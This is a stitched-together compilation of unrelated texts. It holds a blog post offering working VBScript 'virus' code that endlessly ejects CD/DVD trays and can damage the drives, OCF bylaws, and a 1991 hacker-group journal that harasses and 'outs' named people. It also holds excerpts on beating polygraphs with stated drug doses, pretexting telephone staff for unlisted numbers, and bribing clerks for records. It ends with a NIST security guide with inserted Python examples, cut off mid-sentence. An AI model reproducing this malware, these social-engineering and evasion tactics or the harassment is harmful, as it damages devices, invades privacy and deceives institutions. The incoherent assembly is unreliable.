Virus That Ejects your CD/Dvd Drive Again and Again.

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.

In this blog I will show you how to create a virus that ejects your CD/DVD drive again and again. It's not a prank: this can damage your CD/DVD drive.

Here is the code:

' Windows Media Player's COM object exposes the machine's CD/DVD drives
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
' Endless loop: eject every tray twice (on many drives the second
' Eject call closes the tray again), wait five seconds, repeat
Do
    If colCDROMs.Count >= 1 Then
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
    End If
    WScript.Sleep 5000
Loop

Write this code in Notepad and save it as anything.vbs.
Virus created. Now you just need to click it and enjoy.

TAG FILE: Obscene Phobia BBS (January 1, 1995)

[Note: OCF is the Open Computing Facility at UC Berkeley.]

Bylaws of the OCF.

1. The General Manager and the Site Managers cannot
appoint directors except when the OCF is not in session
and the Board of Directors cannot make a quorum because
there are fewer than five directors in town.

2. The OCF Board of Directors shall meet weekly.

3. Any Director missing two consecutive regularly
scheduled meetings will be removed from the Board,
regardless of whether the meetings achieve quorum.

4. OCF Board meetings must be announced to all Directors
at least twenty-four hours in advance.

5. Resolutions by the Board of Directors can be put to a
vote electronically. When putting a resolution to the
Board in this manner, all Board members must be
included in the request for votes. To pass an issue
this way, at least half of all the Board members must
agree. If the motion fails to achieve a majority
within seventy-two hours of being called to such a
vote, the motion fails. The results of the vote will
be posted in roll call form.

6. Attendance lists and minutes for all OCF meetings shall
be maintained for the decisions of that meeting to be
valid.

May 28, 1991

The Book of MOD: Part 5: Who are They And Where Did They Come From? (Summer 1991)

MODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmodMODmod!
===============================================================================

MOD.book.FIVE: Who are they and where did they come from?
————-

Well, it’s time again for another journal. It’s now the
middle of summer 1991. Lately we’ve heard a few good stories
out of the mouths of people we don’t even know. There have
even been a few funny occurrences in the past few weeks.

1) There are rumours that Phiber Optik was wasting his life
away and not using his talents wisely. Well, the truth of
the matter is, he has been a speaker in many public debates
and conferences on hacking in general and computer security.
He is also working as a programmer/developer for a computer
firm in NYC. Also, he is working closely with the EFF (which
recently have set up their own system for their organization).

2) COMSEC is formed. The *new* LOD (whose only member
consists of Erik Bloodaxe) goes into the computer security
business. Nothing to date is documented on their services and
we have yet to see what the hell they can provide. EBA for
one is an original member and he knows close to nothing
(except for the things that he asked Phiber Optik to tell
him). Not to mention these guys are hardly corporate and have
NO experience in the business end of computer security; which
explains why they got caught misrepresenting themselves as
Landmark Graphics to other well-established computer security
firms. Also, they have bragged about narking on a few members
of MOD in their jealous rage. This we can prove through
insiders.

MOD was never a textfile “how-to” group. It was always based
on a brotherhood type deal and everything done is secretive
and has a purpose behind it. LOD on the other hand, never
made sense to any of us anymore. It was good at first, when
all the original (knowledgeable) members were active, but
lately it’s come to be known as a group of guys with
very sparse telecom knowledge riding on a name that once
actually stood for something.

Even Phiber Optik questioned whether LOD meant Legion of Doom
or Lump of Doo-doo (on Gyrotechnic’s private bbs). He stood
firm against all the other members on the system until finally
they were dumbfounded and speechless. Well, the board died.
Now, PO and the rest of the MOD bunch take to them like a
swatter to flies. Give it up fellas.. it’ll never work.

3) Renegade Hacker (a NYC local) thinks he’s cool. He gets
raided, starts talking, and when confronted by MOD, hides
behind mommy. Then he says he hates MOD (which is funny since
he was sweating MOD’s nuts since the day he first got a modem;
those who were at the 2600 know what I mean..) The fact
remains he is a real loser out to make a name for himself by
trying to inspire those who have less contact with the better
hackers in the community.

NASTY (his group) = BIG Joke.
(they write files..the National Enquirer of the h/p world)

*Rent-A-Gay Hacker changed his phone #.. please note the new
one in the database.*

4) Lord Micro gets Xenix and creates what will be modnet 2.
(The Wing is the administrator of #1 in PA) Crazy Eddie
plans to put up a bbs (open forum) in the 2600 Magazine
format (like OSUNY, Central Office, The Toll Center).
NO illegal shit…just theoretical discussion..what real
hackers are made of.

5) Vinny (The Technician) is “outed”. He is an admitted
homosexual. I’m telling you.. watch out for these SSWC
guys..they’re a little funny, ya know?

6) Mind Rape, or something like that, of NSA is a new pest.
Gimme a break. When will they ever learn? Infiniti was
another one, but I guess he’s kept quiet..which is good.
Let’s just hope he doesn’t ask Mind Dweeb for help. Add
Purple “no-show” Mustard (codez kid..see MOD/database for more
info) to this category. Also, there’s another guy using
Acid’s handle in 216. Wasn’t home when we called twice.

Special thanks to Jack Hitt and Paul Tough of Harper’s Magazine.
Great guys, good writers/editors.. damn that stuff was fun.

Hello to State Police Officer Donald Delaney. Not such a bad guy,
just that he IS a cop and he DID bust some of us. But he also got
those guys pirating cellular service in Queens, which really was a
major bust. Nice tie.

===================
= Another MOD.duh =
= file..          =   “More eLiTenezz in one pinky
=                 =    than 2 cans of LOD!”
= All replies can =
= be sent to:     =
=                 =
= MOD@modnet.UUCP =
===================
-> kill r0dentz!!!

eof.MOD.book.5

How to Get Anything on Anyone Excerpts

>———————-
(taken from the book How To Get ANYTHING ON ANYBODY)
By Lee Lapin

rewritten by Woman Watcher for P-80
———————————–

1) NEVER COP OUT. This should be obvious, yet it is one of the most
frequent methods of identifying liars. Remember, the applicant has
nothing to lose by lying, except being branded a liar.

2) BE CONFIDENT. Two items were significantly related to being a better
or worse, within the questions asked at each office. Quite simply, the
better liars SAID they were good liars. Also, the better liars said
they expected to beat the polygraph. The worse liars were not sure,
or did not expect to beat it. No other conceptions about lying,
ambivalence, years of undercover work, etc., had any effect on the
ability to lie.

3) LIE OFTEN. Out of the people who told five or six lies on the test,
eight were among the best liars and one was in the worse group. Of
people who told four or less, three were better, and 12 were in the
worse group. One concludes that the more lies one tells, the greater
chance of being a better liar.

4) DRUGS. The best drug seems to be VALIUM(a preparation of diazepam
marketed by Roche). It is the number one prescribed drug in the country
and it is easy to get, legally and illegally. The prime dosage seems to
be 10 milligrams on an empty stomach. The second drug is ELAVIL
(Amitriptyline, made by MSD). Subjects took 50-75 milligrams and were able to
pass lies.

5) good ol’ TACK IN THE SHOE. This did not work as well as the drugs but
one subject used it on all questions including the control questions.
He was found to have a ‘strong guilt complex’ and was judged unsuitable
for testing.

……………………………………………………………….
How to Beat any Stress Analyzer
——————————-

Unlike the lie detector(polygraph) there is a very simple way to
invalidate a PSE (Psychological Stress Evaluator) or stress analyzer
test:

Drop your voice down to a fairly low register and say the stall-
syllable, “ahhhhh”, as if someone has asked if you have cheated on your
wife…

“Ahhhhhhhhhh,well,ahhhhhhhhhh,noooooooo…Not exactly..”

The “ahhhh” in a non-modulated tone. IT WILL LIGHT UP THE RED LEDS like
a christmas tree.(making the test invalid). Try speaking in the same
manner, a low, steady raspy growl from the back of your throat..

The machine will now indicate everything you say as a lie…
VALIUM works well for this one also..as it calms you down..BOOZE also
works, though not as well as valium.

Next time you talk to an insurance adjuster over the phone and he wants
to record your call, you might remember these tips…
-Woman Watcher

DOWNLOADED FROM P-80 SYSTEMS…..

How to Get Anything on Anyone Excerpts

()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()

| How to get anything on anyone | Part 1 |

()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()

By Toxic Tunic
PHREE WORLD ELITE BBS

Every city has one or more offices dedicated to assigning numbers to the telephone wire pairs. These offices are called DPAC offices and are available to service reps who are installing or repairing phones. To get the DPAC number, a service rep would call the old stand-by, the customer service number for billing information, in the town where the phone whose unlisted number he is trying to get is located. Okay?

The conversation would go like this: 'Hi, San Fran, this is Joe from San Mateo Business office. I need your DPAC number for the south end of town.' The information is usually passed out with no hassle; if the first person does not have it or is not helpful, try one from a different prefix in the same city.

The 'rep' would then call DPAC (note: he would have the listing info from his own district; again he is calling from a nearby town). ''Hi, Dee-Pac, this is Joe from San Mateo Phone Store, I need the listing for 812 First Street.'' The San Francisco office will then give the number at the address requested. There is no notation at DPAC if the number is listed or unlisted. The DPAC number for S.F. is, last time it was checked, (415) 774-8924.... Call Collect...

This file typed by TOXIC TUNIC from the book ''How to Get Anything on Anybody,'' by Lee Lapin. Buy it.

===============================================================================

HOW TO GET ANYTHING ON ANYBODY, PART II
ROCK DIGGING; THE ART OF TURNING OUT FACTS

DIGGING

Without a doubt the number one, very most important thing an investigator can know is WHERE TO FIND INFORMATION. Out there in the jungle are books, libraries, computers, newspapers, and civil servants, all justifying their existence by collecting and storing data on YOU, and unfortunately, me... One can prepare a dossier on almost any person, or company, by simply understanding the system, and knowing where and how to dig. The finished product will be so complete it will scare you. A background investigation done in this fashion will contain things the target himself had forgotten, along with things neither his mother nor wife ever knew...

The following list is the most complete collection myself and a number of experts in the field could come up with. Most of the sources listed are publicly, or semi-publicly available. Some are considered closed. In dealing with any set of records under the control of a living person there is no such thing as a closed source. Some simply necessitate a different plan of attack. Civil servants, city hall record keepers and such, are often bendable by the correct use of flattery and involving them in an ''important investigation'' to find the real father of Susie before she succumbs to the cancer... Bribes are often an acceptable alternative. The key here is to determine who actually needs to be bribed. Never go for the head of a department if a low-paid clerk has physical control of the materials...

Many of these sources can be found at a large library, or private collection. Rarely does one have to buy expensive directories. When applicable I have included source suggestions. GOOD HUNTING!

TELEPHONE DIRECTORIES --- Most Americans are listed in a phone directory somewhere. You can find major and many minor directories at big city libraries. The phone company will also give you, free of charge, any directory you ask for, if it is for business purposes.

REVERSE DIRECTORIES --- This particular edition lists the number, 771-3082, followed by the owner, Jones, Jim, and address, 69 Peyton Place. Same sources as the other directories.

PRIVATE TELCO INFORMATION --- Every phone company has a list of their unpublished numbers, along with long distance call records, credit applications, where else the target has had a telephone and any additional listings or references he used on his original application. This information comes under the control of the telco's Chief Special Agent. He is in charge of hunting down nasties who defraud the phone company in one way or another and is probably an ex-cop or federal agent. He usually cooperates with legitimate police agencies and may help along a PI or other person with a cause. In smaller phone companies, or outlying districts, the Chief Operator will have access to this information. Good people to make friends with.......

UNLISTED NUMBERS --- There is no legal way to get an unlisted/unpublished number. There are a couple of other ways. [see part I] The phone company puts out a small book of all unlisted numbers in their area. A phone person can sometimes be bribed to sell a copy of this book. If the number is actually unlisted a good private detective will have sources for it or follow my technique.

[This was an excerpt from ''How to Get Anything on Anybody,'' by Lee Lapin. It's a good book. Buy copies for all your friends.]

[MORE NEXT PHILE...]

[Phree World Elite BBS banner]
(916) 689-6241 24 Hours/7 Days SysOp: Dark Creaper Co-Sysop: ShAdOwRuNnEr

HOW TO GET ANYTHING ON ANYBODY
PART III
MORE INFO-GATHERING...

CROSS DIRECTORY --- Each local phone company publishes a cross directory. This book lists every address in the district by street and then gives the occupants' name and telephone number. It DOES NOT list unlisted/unpublished numbers. The directory is normally updated every couple of months and is rented on a subscription basis. Many local libraries will have a copy. Most collection agents, some answering services and many news departments of radio and television stations will have a copy you can borrow for a moment. This directory is invaluable when tracking someone. If you can't find their number you can at least call their ex-neighbors with a nice story and come up with some information...

CITY DIRECTORIES --- Since the 1800's R.L. Polk Company of Taylor, Michigan has published city directories for most cities in the US. Sometime later they were joined by Cole's Householder Directories, Lincoln, Nebraska. These directories are NOT based on telco information, but are compiled by having some $3.00 an hour ''investigator'' walk from house to house asking who lives there, how many in the family, the phone number, etc. If they miss anyone they leave a mail form. Many people who would not list their phone numbers, or don't have a phone in their name, will obligingly fill out these snoop forms because of the accompanying propaganda about how important the information is... Most libraries will have at least one of the directories for their area; phone companies will list the local office of the directory compilers. Collection agencies and news departments will have a copy of the directory.

CERTIFICATES OF EXISTENCE --- The government loves you. To prove that, they are constantly collecting data to verify that you exist...

BIRTH CERTIFICATE --- Name of child, eye color, name of father, mother's maiden name, date and place of birth, father's occupation, if couple not married at birth, name of doctor who delivered.

MARRIAGE CERTIFICATES --- Name and place of birth for the man and woman, her maiden name, man's occupation, status of any previous marriages, birth dates and places, blood type.

DEATH CERTIFICATES --- Date and cause of death, doctor who signed the certificate, residence and occupation, SS number, military record, birth date and place, cemetery and funeral home names [whatever turns you on...].

DMV --- The Department of Motor Vehicles is a natural source for important data; in some states a call will give you the info sought, in some one mails a license number and a small fee (around $1.00) to the DMV and they will return the favor with owner info, and in some states they will not give out any details to anyone but the cops. One approach to this problem is to go thru the cops (I was hitchhiking and left something in this car, the license number is...).

SCHOOLS --- A cumulative file is kept on every student from kindergarten thru Ph.D. by the school involved. This file will include such things as parents, addresses, grades, IQ, receiving and forwarding addresses.

[This has been yet another boring excerpt from ''How to Get Anything on Anybody.'' Buy it, or I'll find you and throw rocks and garbage at you.]

----> t o x i c   t u n i c <---- March 1986.

[Phree World Elite BBS banner]
(916) 689-6241 24 Hours/7 Days SysOp: Dark Creaper Co-Sysop: ShAdOwRuNnEr

DOWNLOADED FROM P-80 SYSTEMS........

The NIST Management Guide to the Protection of Information Resources

Management Guide to the Protection of Information Resources

National Institute of Standards and Technology
The National Institute of Standards and Technology (NIST) is
responsible for developing standards, providing technical
assistance, and conducting research for computers and related
systems. These activities provide technical support to
government and industry in the effective, safe, and
economical use of computers. With the passage of the Computer
Security Act of 1987 (P.L. 100-235), NIST’s activities also
include the development of standards and guidelines needed to
assure the cost-effective security and privacy of sensitive
information in Federal computer systems. This guide represents
one activity towards the protection and management of sensitive
information resources.

Acknowledgments
This guide was written by Cheryl Helsing of Deloitte, Haskins &
Sells in conjunction with Marianne Swanson and Mary Anne Todd,
National Institute of Standards and Technology.

Executive Summary
Today computers are integral to all aspects of operations within
an organization. As Federal agencies are becoming critically
dependent upon computer information systems to carry out their
missions, the agency executives (policy makers) are recognizing
that computers and computer-related problems must be understood
and managed, the same as any other resource. They are beginning
to understand the importance of setting policies, goals, and
standards for protection of data, information, and computer
resources, and are committing resources for information security
programs. They are also learning that primary responsibility for
data security must rest with the managers of the functional areas
supported by the data.

All managers who use any type of automated information resource
system must become familiar with their agency’s policies and
procedures for protecting the information which is processed and
stored within them. Adequately secure systems deter, prevent, or
detect unauthorized disclosure, modification, or use of
information. Agency information requires protection from
intruders, as well as from employees with authorized computer
access privileges who attempt to perform unauthorized actions.
Protection is achieved not only by technical, physical and
personnel safeguards, but also by clearly articulating and
implementing agency policy regarding authorized system use to
information users and processing personnel at all levels. This
guide is one of three brochures that have been designed for a
specific audience. The “Executive Guide to the Protection of
Information Resources” and the “Computer User’s Guide to the
Protection of Information Resources” complete the series.

Table of Contents

Executive Summary
Introduction
  Purpose of Guide
  The Risks
  Responsibilities
Information Systems Development
  Control Decisions
  Security Principles
  Access Decisions
  Systems Development Process
Computer Facility Management
  Physical Security
  Data Security
  Monitoring and Review
Personnel Management
  Personnel Security
  Training
For Additional Information

Introduction

Purpose of this Guide
This guide introduces information systems security concerns and
outlines the issues that must be addressed by all agency managers
in meeting their responsibilities to protect information systems
within their organizations. It describes essential components of
an effective information resource protection process that applies
to a stand alone personal computer or to a large data processing
facility.

The Risks
Effort is required by every Federal agency to safeguard
information resources and to reduce risks to a prudent level.
The spread of computing power to individual employees via
personal computers, local-area networks, and distributed
processing has drastically changed the way we manage and control
information resources. Internal controls and control points that
were present in the past when we were dealing with manual or
batch processes have not been established in many of today’s
automated systems. Reliance upon inadequately controlled computer
systems can have serious consequences, including:

Inability or impairment of the agency’s ability to perform its
mission

Inability to provide needed services to the public

Waste, loss, misuse, or misappropriation of funds

Loss of credibility or embarrassment to an agency

To avoid these consequences, a broad set of information security
issues must be effectively and comprehensively addressed.

Responsibilities
All functional managers have a responsibility to implement the
policies and goals established by executive management for
protection of automated information resources (data, processes,
facilities, equipment, personnel, and information). Managers in
all areas of an organization are clearly accountable for the
protection of any of these resources assigned to them to enable
them to perform their duties. They are responsible for
developing, administering, monitoring, and enforcing internal
controls, including security controls, within their assigned
areas of authority. Each manager’s specific responsibilities will
vary, depending on the role that manager has with regard to
computer systems.

Portions of this document provide more detailed information on
the respective security responsibilities of managers of computer
resources, managers responsible for information systems
applications and the personnel security issues involved.
However, all agency management must strive to:

Achieve Cost-Effective Security
The dollars spent for security measures to control or contain
losses should never be more than the projected dollar loss if
something adverse happened to the information resource.
Cost-effective security results when reduction in risk through
implementation of safeguards is balanced with costs. The greater
the value of information processed, or the more severe the
consequences if something happens to it, the greater the need
for control measures to protect it.
The person who can best determine the value or importance of
data is the functional manager who is responsible for the data.
For example, the manager responsible for the agency’s budget
program is the one who should establish requirements for the
protection of the automated data which supports the program. This
manager knows better than anyone else in the organization what
the impact will be if the data is inaccurate or unavailable.
Additionally, this manager usually is the supervisor of most of
the users of the data.

It is important that these trade-offs of cost versus risk
reduction be explicitly considered, and that management
understand the degree of risk remaining after selected controls
are implemented.

Assure Operational Continuity
With ever-increasing demands for timely information and greater
volumes of information being processed, the threat of information
system disruption is a very serious one. In some cases,
interruptions of only a few hours are unacceptable. The impact
due to inability to process data should be assessed, and actions
should be taken to assure availability of those systems
considered essential to agency operation. Functional management
must identify critical computer applications and develop
contingency plans so that the probability of loss of data
processing and telecommunications support is minimized.

Maintain Integrity
Integrity of information means you can trust the data and the
processes that manipulate it. Not only does this mean that errors
and omissions are minimized, but also that the information system
is protected from deliberate actions to wrongfully change the
data. Information can be said to have integrity when it
corresponds to the expectations and assumptions of the users.

Assure Confidentiality
Confidentiality of sensitive data is often, but not always, a
requirement of agency systems. Privacy requirements for personal
information are dictated by statute, while confidentiality of
other agency information is determined by the nature of that
information, e.g., information submitted by bidders in
procurement actions. The impact of wrongful disclosure must be
considered in understanding confidentiality requirements.

Comply with Applicable Laws and Regulations
As risks and vulnerabilities associated with information systems
become better understood, the body of law and regulations
compelling positive action to protect information resources
grows. OMB Circular No. A-130, “Management of Federal
Information Resources” and Public Law 100-235, “Computer Security
Act of 1987” are two documents where the knowledge of these
regulations and laws provide a baseline for an information
resource security program.

Information Systems Development
This section describes the protective measures that should be
included as part of the design and development of information
processing application systems. The functional manager who is
responsible for, and will use, the information contained in the
system must ensure that security measures have been included and
are adequate. This includes applications designed for personal
computers as well as large mainframes.

Control Decisions
The official responsible for the agency function served by the
automated information system has a critical role in making
decisions regarding security and control. In the past, risk was
often unconsciously accepted when such individuals assumed the
computer facility operators were taking care of security. In
fact, there are decisions to be made and security elements to be
provided that cannot be delegated to the operator of the system.
In many cases, the user or manager develops the application and
operates it alone.

The cost of control must be balanced with system efficiency and
usability issues. Risk must be evaluated and cost-effective
controls selected to provide a prudent level of control while
maximizing productivity. Controls are often closely connected
with the system function, and cannot be effectively designed
without significant understanding of the process being automated.

Security Principles
There are some common security attributes that should be present
in any system that processes valuable personal or sensitive
information. System designs should include mechanisms to enforce
the following security attributes.

Identification and Authentication of Users
Each user of a computer system should have a unique
identification on the system, such as an account number or other
user identification code. There must also be a means of verifying
that the individual claiming that identity (e.g., by typing in
that identifying code at a terminal) is really the authorized
individual and not an imposter. The most common means of
authentication is by a secret password, known only to the
authorized user.

Authorization Capability Enforcing the Principle of Least
Possible Privilege
Beyond ensuring that only authorized individuals can access the
system, it is also necessary to limit the users' access to
information and transaction capabilities. Each person should be
limited to only the information and transaction authority that is
required by their job responsibilities. This concept, known as
the principle of least possible privilege, is a long-standing
control practice. There should be a way to easily assign each
user just the specific access authorities needed.

Individual Accountability
From both a control and legal point of view, it is necessary to
maintain records of the activities performed by each computer
user. The requirements for automated audit trails should be
developed when a system is designed. The information to be
recorded depends on what is significant about each particular
system. To be able to hold individuals accountable for their
actions, there must be a positive means of uniquely identifying
each computer user and a routinely maintained record of each
user’s activities.

Audit Mechanisms
Audit mechanisms detect unusual events and bring them to the
attention of management. This commonly occurs by violation
reporting or by an immediate warning to the computer system
operator. The type of alarm generated depends on the seriousness
of the event.

A common technique to detect access attempts by unauthorized
individuals is to count attempts. The security monitoring
functions of the system can automatically keep track of
unsuccessful attempts to gain access and generate an alarm if the
attempts reach an unacceptable number.

Performance Assurance
A basic design consideration for any information system should
be the ability to verify that the system is functioning as
intended. Systems that are developed without such design
considerations are often very difficult to independently audit or
review, leading to the possibility of unintended results or
inaccurate processing.

Recoverability
Because Federal agencies can be heavily dependent on a computer
system, an important design consideration is the ability to recover
easily from troublesome events, whether minor problems or major
disruptions. Systems should be designed to recover easily from
minor problems, and either to be transportable to a backup computer
system or to be replaceable by manual processes in case of major
disruption or loss of the computer facility.

Access Decisions
Once the automated system is ready to use, decisions must be
made regarding access to the system and the information it
contains. For example, many individuals require the ability to
access and view data, but not the ability to change or delete
data. Even when computer systems have been designed to provide
the ability to narrowly designate access authorities, a
knowledgeable and responsible official must actually make those
access decisions. The care that is taken in this process is a
major determining factor of the level of security and control
present in the system. If sensitive data is being transmitted
over unprotected lines, it can be intercepted or passive
eavesdropping can occur. Encrypting the files will make the data
unintelligible and port protection devices will protect the files
from unauthorized access, if warranted.
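The least-privilege passage above calls for an easy way to assign each user only the authorities the job needs, this section calls for a responsible official to decide who may view data and who may also change or delete it, and the Individual Accountability section calls for a record of each user's activities. One data structure serves all three. This is an added example, not code from the guide: the authority names (READ, UPDATE, DELETE), the job roles, the data set and user names are constructed for illustration.

```python
"""Access authorities assigned by job role, with an audit trail of every
grant and every access decision. Added example; not from the guide.

Roles, data sets, users and the official's identifier are constructed.
"""
from dataclasses import dataclass, field
from enum import Flag, auto


class Authority(Flag):
    """Transaction authorities a user may hold on a data set."""
    NONE = 0
    READ = auto()
    UPDATE = auto()
    DELETE = auto()


def describe(auth):
    """Portable name for a (possibly combined) authority, e.g. 'READ|UPDATE'."""
    names = [m.name for m in Authority if m is not Authority.NONE and m in auth]
    return "|".join(names) or "NONE"


# Hypothetical job roles: each lists only the authorities that job requires.
# Note that the supervisor may change payroll records but not delete them.
ROLES = {
    "payroll-clerk": {"payroll": Authority.READ},
    "payroll-supervisor": {"payroll": Authority.READ | Authority.UPDATE},
    "records-officer": {"payroll": Authority.DELETE, "personnel": Authority.READ},
}


@dataclass
class AccessControl:
    # (user, data set) -> authorities held. Anything not listed is denied,
    # so a user starts with nothing until an official assigns a role.
    grants: dict = field(default_factory=dict)
    audit_trail: list = field(default_factory=list)

    def assign_role(self, official, user, role):
        """Grant the authorities of one role; record who made the decision."""
        for dataset, auth in ROLES[role].items():
            key = (user, dataset)
            self.grants[key] = self.grants.get(key, Authority.NONE) | auth
            self.audit_trail.append(("GRANT", official, user, dataset, describe(auth)))

    def check(self, user, dataset, requested):
        """Allow only if every requested authority is held; log the outcome
        against the uniquely identified user either way."""
        held = self.grants.get((user, dataset), Authority.NONE)
        allowed = (held & requested) == requested
        self.audit_trail.append(
            ("ALLOW" if allowed else "DENY", user, dataset, describe(requested)))
        return allowed


def build_demo():
    """Constructed scenario: one clerk and one supervisor on the payroll file."""
    ac = AccessControl()
    ac.assign_role("official.hr", "clerk1", "payroll-clerk")
    ac.assign_role("official.hr", "super1", "payroll-supervisor")
    return ac
```

Because the default for an unlisted (user, data set) pair is NONE, adding a new user or a new data set grants nothing until an official acts, and the audit trail ties each grant to that official and each allow or deny to the user who requested it.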

Systems Development Process
All information systems software should be developed in a
controlled and systematic manner according to agency standards. An
inadequate development process can degrade the quality and
efficiency of the data processed and complicate any later
reconfiguration of the system. The risk of security exposures and
vulnerabilities is greatly reduced when the systems development
process is itself controlled.

Computer Facility Management
Functional managers play a critical role in assuring that agency
information resources are appropriately safeguarded. This section
describes the protective measures that should be incorporated
into the ongoing management of information resource processing
facilities. As defined in OMB Circular No. A-130, “Management of
Federal Information Resources,” the term “information technology
facility” means an organizationally defined set of personnel,
hardware, software, and physical facilities, a primary function
of which is the operation of information technology. This
section, therefore, applies to any manager who houses a personal
computer, mainframe, or any other form of office system or
automated equipment.

Physical Security
Information cannot be appropriately protected unless the
facilities that house the equipment are properly protected from
physical threats and hazards. The major areas of concern are
described below.

Environmental Conditions
For many types of computer equipment, strict environmental
conditions must be maintained. Manufacturer’s specifications
should be observed for temperature, humidity, and electrical
power requirements.

Control of Media
The media upon which information is stored should be carefully
controlled. Transportable media such as tapes and cartridges
should be kept in secure locations, and accurate records kept of
the location and disposition of each. In addition, media from an
external source should be subject to a check-in process to ensure
it is from an authorized source.

Control of Physical Hazards
Each area should be surveyed for potential physical hazards.
Fire and water are two of the most damaging forces with regard to
computer systems. Opportunities for loss should be minimized by an
effective fire detection and suppression mechanism and by planning
that reduces the danger of leaks or flooding. Other physical
controls include reducing the visibility of the equipment and
strictly limiting access to the area or equipment.

Contingency Planning
Although risks can be minimized, they cannot be eliminated. When
reliance upon a computer facility or application is substantial,
some type of contingency plan should be devised to allow critical
systems to be recovered following a major disaster, such as a
fire. There are a number of alternative approaches that should be
evaluated to most cost-effectively meet the agency’s need for
continuity of service.

Configuration Management
Risk can be introduced through unofficial and unauthorized
hardware or software. Another key component of information
resource management is ensuring only authorized hardware and
software are being utilized. There are several control issues to
be addressed.

Maintaining Accurate Records
Records of hardware/software inventories, configurations, and
locations should be maintained and kept up-to-date.

Complying with Terms of Software Licenses
Especially with microcomputer software, illegal copying and
other uses in conflict with licensing agreements are concerns.
The use of software subject to licensing agreements must be
monitored to ensure it is used according to the terms of the
agreement.

Protecting Against Malicious Software and Hardware
The recent occurrences of destructive computer “viruses” point
to the need to ensure that agencies do not allow unauthorized
software to be introduced to their computer environments.
Unauthorized hardware can also contain hidden vulnerabilities.
Management should adopt a strong policy against unauthorized
hardware/software, inform personnel about the risks and
consequences of unauthorized additions to computer systems, and
develop a monitoring process to detect violations of the policy.
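The inventory records called for under Maintaining Accurate Records and the monitoring process called for here can be the same mechanism: record a fingerprint of each approved program, then compare what is actually installed against that record. The following is an added example, not code from the guide. The program names and contents are constructed byte strings held in memory so the example runs offline; a real monitor would hash the files on disk.

```python
"""Authorized-software baseline check. Added example; not from the guide.

APPROVED_SOFTWARE and WORKSTATION_INVENTORY are constructed (name -> bytes)
and stand in for files read from disk.
"""
import hashlib


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def build_baseline(authorized):
    """Record the hash of each approved program at the time it is approved."""
    return {name: sha256(contents) for name, contents in authorized.items()}


def audit_inventory(baseline, installed):
    """Compare an installed inventory against the approved baseline.

    unauthorized: present but never approved (the policy violation itself)
    modified:     approved name but changed contents, as an infected or
                  patched executable would be
    missing:      approved but no longer present
    """
    findings = {"unauthorized": [], "modified": [], "missing": []}
    for name in sorted(installed):
        if name not in baseline:
            findings["unauthorized"].append(name)
        elif sha256(installed[name]) != baseline[name]:
            findings["modified"].append(name)
    findings["missing"] = sorted(set(baseline) - set(installed))
    return findings


# Constructed approved inventory (not real programs).
APPROVED_SOFTWARE = {
    "WP.EXE": b"approved word processor build 4.2",
    "SPREAD.EXE": b"approved spreadsheet build 2.0",
    "PAYROLL.EXE": b"agency payroll application 1.7",
}

# Constructed snapshot of one workstation: one program altered,
# one unapproved program added, one approved program removed.
WORKSTATION_INVENTORY = {
    "WP.EXE": b"approved word processor build 4.2",
    "SPREAD.EXE": b"approved spreadsheet build 2.0" + b"\x90" * 8,
    "GAME.EXE": b"shareware game copied from a diskette",
}


def run_demo():
    return audit_inventory(build_baseline(APPROVED_SOFTWARE), WORKSTATION_INVENTORY)
```

The check is only as good as its baseline: a program that was already altered when it was approved would be recorded as authorized. That is the reason the Control of Media section asks that media from an external source go through a check-in process before it reaches the baseline.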

Data Security
Management must ensure that appropriate security mechanisms are
in place that allow responsible officials to designate access to
data according to individual computer users’ specific needs.
Security mechanisms should be sufficient to implement individual
authentication of system users, allow authorization to specific
information and transaction authorities, maintain audit trails as
specified by the responsible official, and encrypt sensitive
files if required by user management.

Monitoring and Review
A final aspect of information resource protection to be
considered is the need for ongoing management monitoring and
review. To be effective, a security program must be a continuous
effort. Ideally, ongoing processes should be adapted to include
information protection checkpoints and reviews. Information
resource protection should be a key consideration in all major
computer system initiatives.

Earlier, the need for system audit trails was discussed. Those
audit trails are useful only if management regularly reviews
exception items or unusual activities. Irregularities should be
researched and action taken when merited. Similarly, all
information-related losses and incidents should be investigated.

A positive benefit of an effective monitoring process is an
increased understanding of the degree of information-related risk
in agency operations. Without an ongoing feedback process,
management may unknowingly accept too much risk. Prudent
decisions about trade-offs between efficiency and control can
only be made with a clear understanding of the degree of inherent
risk. Every manager should ask questions and periodically review
operations to judge whether changes in the environment have
introduced new risk, and to ensure that controls are working
effectively.

Personnel Management
Managers must be aware that information security is more a
people issue than a technical issue. Personnel are a vital link
in the protection of information resources, as information is
gathered by people, entered into information resource systems by
people, and ultimately used by people. Security issues should be
addressed with regard to:
People who use computer systems and store information in the
course of their normal job responsibilities
People who design, program, test, and implement critical or
sensitive systems
People who operate computer facilities that process critical or
sensitive data

Personnel Security
From the point of hire, individuals who will have routine access
to sensitive information resources should be subject to special
security procedures. More extensive background or reference
checks may be appropriate for such positions, and security
responsibilities should be explicitly covered in employee
orientations. Position descriptions and performance evaluations
should also explicitly reference unusual responsibilities
affecting the security of information resources.

Individuals in sensitive positions should be subject to job
rotation, and work flow should be designed in such a way as to
provide as much separation of sensitive functions as possible.
Upon decision to terminate or notice of resignation, expedited
termination or rotation to less sensitive duties for the
remainder of employment is a reasonable precaution.

Any Federal computer user who deliberately performs or attempts
to perform unauthorized activity should be subject to
disciplinary action, and such disciplinary action must be
uniformly applied throughout the agency. Any criminal activity
under Federal or state computer crime laws must be reported to
law enforcement authorities.

Training
Most information resource security problems involve people.
Problems can usually be identified in their earliest stages by
people who are attuned to the importance of information
protection issues. A strong training program will yield large
benefits in prevention and early detection of problems and
losses. To be most effective, training should be tailored to the
particular audience being addressed, e.g., executives and policy
makers; program and functional managers; IRM security and audit;
ADP management and operations; end users.

Most employees want to do the right thing, if agency
expectations are clearly communicated. Internal policies can be
enforced only if staff have been made aware of their individual
responsibilities. All personnel who access agency computer
systems should be aware of their responsibilities under agency
policy, as well as obligations under the law. Disciplinary
actions and legal penalties should be communicated.

For Additional Information

National Institute Of Standards and Technology
Computer Security Program Office, A-216 Technology
Gaithersburg, MD 20899
(301) 975-5200

For further information on the management of information
